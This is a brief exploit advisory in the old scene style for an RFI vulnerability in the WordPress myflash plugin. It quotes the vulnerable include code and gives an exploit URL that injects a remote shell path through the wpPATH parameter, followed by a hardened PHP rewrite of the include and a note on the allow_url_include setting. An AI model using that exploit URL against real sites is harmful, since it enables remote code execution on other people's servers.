Wordpress plugin myflash vulnerability allows Remote File Inclusion (RFI) via wpPATH parameter in myflash-button.php, potentially allowing unauthorized file access
`--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: [email protected]
--------------------------------------------------------------------------------
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
--------------------------------------------------------------------------------
Vuln in myflash-button.php
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
global $wpdb;
--------------------------------------------------------------------------------
Exploit:
http://[target]/[path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
--------------------------------------------------------------------------------
greets:
Every Body
--------------------------------------------------------------------------------
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
`
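A hardened form of the include logic quoted above, as an added example that is not the plugin's own code or an official patch: the WordPress root is derived from the script's own location, so no request value reaches `require_once`. The helper name `myflash_find_wp_root` and the depth limit are hypothetical, and the example assumes `wp-config.php` sits in the WordPress root next to `wp-admin/`.

```php
<?php
// Added example: locate the WordPress root without trusting $_GET/$_POST.
// The vulnerable code concatenates the request parameter wpPATH into
// require_once(), so the caller controls which file PHP loads.

/**
 * Walk up from $startDir until a directory holding both wp-config.php and
 * wp-admin/admin.php is found. Returns the canonical path, or null.
 * Hypothetical helper; $maxDepth is an assumed safety bound.
 */
function myflash_find_wp_root(string $startDir, int $maxDepth = 6): ?string
{
    $dir = realpath($startDir); // canonical local path, no symlinks or ".."
    for ($i = 0; $dir !== false && $i < $maxDepth; $i++) {
        if (is_file($dir . '/wp-config.php') && is_file($dir . '/wp-admin/admin.php')) {
            return $dir;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {
            break; // reached the filesystem root
        }
        $dir = $parent;
    }
    return null;
}

// The plugin lives in wp-content/plugins/myflash/, so the root is found a
// few levels above __DIR__. Any wpPATH value in the request is ignored.
$wppath = myflash_find_wp_root(__DIR__);
if ($wppath === null) {
    http_response_code(500);
    exit('WordPress installation not found');
}

require_once $wppath . '/wp-config.php';
require_once $wppath . '/wp-admin/admin.php';
global $wpdb;
```

As defense in depth, keeping the `allow_url_include` setting in `php.ini` at `Off` stops `require_once` from fetching code over `http://` or `ftp://`, though a request-controlled path could still point at local files, which is why the parameter is dropped entirely here.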